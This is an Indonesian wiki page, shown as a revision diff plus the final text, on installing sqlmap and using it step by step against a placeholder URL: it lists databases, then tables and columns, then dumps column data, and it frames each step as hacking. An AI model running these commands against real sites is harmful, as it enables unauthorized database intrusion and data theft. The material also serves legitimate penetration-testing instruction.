Jump to content

SQLMAP: Difference between revisions

From Wiki
Kangtain (talk | contribs)
Bureaucrats, Interface administrators, Suppressors, Administrators
9,154 edits
VisualWikitext
Created page with "'''SQLMAP''' adalah alat pengujian penetrasi open source yang mengotomatiskan proses mendeteksi dan mengeksploitasi kelemahan injeksi SQL dan mengambil alih server database. I..."
 
No edit summary
 
(6 intermediate revisions by the same user not shown)
Line 4: Line 4:


==Installasi==
==Installasi==
wget '<nowiki>https://github.com/sqlmapproject/sqlmap/tarball/master</nowiki>' --output-document=sqlmap.tar.gz
<syntaxhighlight lang="shell">
wget 'https://github.com/sqlmapproject/sqlmap/tarball/master' --output-document=sqlmap.tar.gz
</syntaxhighlight>


tar -xvf sqlmap.tar.gz
<syntaxhighlight lang="shell">
tar -xvf sqlmap.tar.gz
</syntaxhighlight>


cd sqlmapproject-sqlmap-c4f9e66/
<syntaxhighlight lang="shell">
cd sqlmapproject-sqlmap-c4f9e66/
</syntaxhighlight>


python sqlmap.py --version
<syntaxhighlight lang="shell">
python sqlmap.py --version
</syntaxhighlight>


*Atau bisa menggunakana perintah berikut
*Atau bisa menggunakana perintah berikut  
sudo apt install sqlmap
<syntaxhighlight lang="shell">
sudo apt install sqlmap
</syntaxhighlight>


==Usage==
==Usage==
*Buka direktori sqlmap Anda dan Jalankan perintah ini untuk menguji perintah sql.
*Buka direktori sqlmap Anda dan Jalankan perintah ini untuk menguji perintah sql.
*Dimana
*Dimana
-u :- artinya url yang akan kita hack
<syntaxhighlight lang="shell">
–dbs :- perintah akan menampilkan daftar database yang dapat diretas.
-u :- artinya url yang akan kita hack
–dbs :- perintah akan menampilkan daftar database yang dapat diretas.
</syntaxhighlight>


===Ubuntu===
===Ubuntu===
./sqlmap.py -u <code><nowiki>http://www.example.com/about.php?id=1</nowiki></code> --dbs
<syntaxhighlight lang="shell">
./sqlmap.py -u http://www.example.com/about.php?id=1 --dbs
</syntaxhighlight>


===Kali Linux===
===Kali Linux===
sqlmap -u <code><nowiki>http://www.example.com/about.php?id=1</nowiki></code> --dbs
<syntaxhighlight lang="shell">
sqlmap -u http://www.example.com/about.php?id=1 --dbs
</syntaxhighlight>


*Sekarang retas tabel database yang diretas.
*Sekarang retas tabel database yang diretas.
*Dimana
*Dimana
-D :- berarti nama database yang akan Anda retas
<syntaxhighlight lang="shell">
–tabel :- perintah akan menampilkan semua tabel database yang diretas.
-D :- berarti nama database yang akan Anda retas
–tabel :- perintah akan menampilkan semua tabel database yang diretas.
</syntaxhighlight>


===Ubuntu===
===Ubuntu===
./sqlmap.py -u <code><nowiki>http://www.example.com/about.php?id=1</nowiki></code> --dbs -D exampledb --tables
<syntaxhighlight lang="shell">
./sqlmap.py -u http://www.example.com/about.php?id=1 --dbs -D exampledb --tables
</syntaxhighlight>


===Kali Linux===
===Kali Linux===
sqlmap -u <code><nowiki>http://www.example.com/about.php?id=1</nowiki></code> --dbs -D exampledb --tables
<syntaxhighlight lang="shell">
sqlmap -u http://www.example.com/about.php?id=1 --dbs -D exampledb --tables
</syntaxhighlight>


*Tugas selanjutnya adalah mengambil kolom dari tabel apa pun.
*Tugas selanjutnya adalah mengambil kolom dari tabel apa pun.
*Dimana
*Dimana
-T :- artinya Nama tabel yang akan diretas
<syntaxhighlight lang="shell">
–columns :- perintah akan menampilkan semua kolom tabel.
-T :- artinya Nama tabel yang akan diretas
–columns :- perintah akan menampilkan semua kolom tabel.
</syntaxhighlight>


===Ubuntu===
===Ubuntu===
./sqlmap.py -u <code><nowiki>http://www.example.com/about.php?id=1</nowiki></code> --dbs -D exampledb --tables -T apllied_items --columns
<syntaxhighlight lang="shell">
./sqlmap.py -u http://www.example.com/about.php?id=1 --dbs -D exampledb --tables -T apllied_items --columns
</syntaxhighlight>


===Kali Linux===
===Kali Linux===
sqlmap -u <code><nowiki>http://www.example.com/about.php?id=1</nowiki></code> --dbs -D exampledb --tables -T apllied_items --columns
<syntaxhighlight lang="shell">
sqlmap -u http://www.example.com/about.php?id=1 --dbs -D exampledb --tables -T apllied_items --columns
</syntaxhighlight>


*Sekarang ini adalah tugas terakhir Anda mengambil data nyata dari tabel.
*Sekarang ini adalah tugas terakhir Anda mengambil data nyata dari tabel.
*Dimana
*Dimana
-C :- artinya nama Kolom tabel.
<syntaxhighlight lang="shell">
–dump :- perintah akan menampilkan semua data dari kolom yang diberikan.
-C :- artinya nama Kolom tabel.
–dump :- perintah akan menampilkan semua data dari kolom yang diberikan.
</syntaxhighlight>


===Ubuntu===
===Ubuntu===
./sqlmap.py -u <code><nowiki>http://www.example.com/about.php?id=1</nowiki></code> --dbs -D exampledb --tables -T apllied_items --columns -C menuid --dump
<syntaxhighlight lang="shell">
./sqlmap.py -u http://www.example.com/about.php?id=1 --dbs -D exampledb --tables -T apllied_items --columns -C menuid --dump
</syntaxhighlight>


===Kali Linux===
===Kali Linux===
sqlmap -u <code><nowiki>http://www.example.com/about.php?id=1</nowiki></code> --dbs -D exampledb --tables -T apllied_items --columns -C menuid --dump
<syntaxhighlight lang="shell">
sqlmap -u http://www.example.com/about.php?id=1 --dbs -D exampledb --tables -T apllied_items --columns -C menuid --dump
</syntaxhighlight>


[[Category:Software]]
[[Category:Software]]
[[Category:Linux]]
[[Category:Linux]]
[[Category:Security]]
[[Category:Security]]

Latest revision as of 16:24, 14 December 2025

SQLMAP adalah alat pengujian penetrasi open source yang mengotomatiskan proses mendeteksi dan mengeksploitasi kelemahan injeksi SQL dan mengambil alih server database. Ini adalah alat open source untuk menggunakan injeksi sql dengan cara yang lebih baik dan lebih sederhana.

Ini sudah diinstal sebelumnya pada Sistem Operasi KALI LINUX.

Installasi

wget 'https://github.com/sqlmapproject/sqlmap/tarball/master' --output-document=sqlmap.tar.gz

tar -xvf sqlmap.tar.gz

cd sqlmapproject-sqlmap-c4f9e66/

python sqlmap.py --version
  • Atau bisa menggunakana perintah berikut
sudo apt install sqlmap

Usage

  • Buka direktori sqlmap Anda dan Jalankan perintah ini untuk menguji perintah sql.
  • Dimana
-u :- artinya url yang akan kita hack
–dbs :- perintah akan menampilkan daftar database yang dapat diretas.

Ubuntu

./sqlmap.py -u http://www.example.com/about.php?id=1 --dbs

Kali Linux

sqlmap -u http://www.example.com/about.php?id=1 --dbs
  • Sekarang retas tabel database yang diretas.
  • Dimana
-D :- berarti nama database yang akan Anda retas
–tabel :- perintah akan menampilkan semua tabel database yang diretas.

Ubuntu

./sqlmap.py -u http://www.example.com/about.php?id=1 --dbs -D exampledb --tables

Kali Linux

sqlmap -u http://www.example.com/about.php?id=1 --dbs -D exampledb --tables
  • Tugas selanjutnya adalah mengambil kolom dari tabel apa pun.
  • Dimana
-T :- artinya Nama tabel yang akan diretas
–columns :- perintah akan menampilkan semua kolom tabel.

Ubuntu

./sqlmap.py -u http://www.example.com/about.php?id=1 --dbs -D exampledb --tables -T apllied_items --columns

Kali Linux

sqlmap -u http://www.example.com/about.php?id=1 --dbs -D exampledb --tables -T apllied_items --columns
  • Sekarang ini adalah tugas terakhir Anda mengambil data nyata dari tabel.
  • Dimana
-C :- artinya nama Kolom tabel.
–dump :- perintah akan menampilkan semua data dari kolom yang diberikan.

Ubuntu

./sqlmap.py -u http://www.example.com/about.php?id=1 --dbs -D exampledb --tables -T apllied_items --columns -C menuid --dump

Kali Linux

sqlmap -u http://www.example.com/about.php?id=1 --dbs -D exampledb --tables -T apllied_items --columns -C menuid --dump
Retrieved from "https://kangtain.com/wiki/index.php?title=SQLMAP&oldid=9056"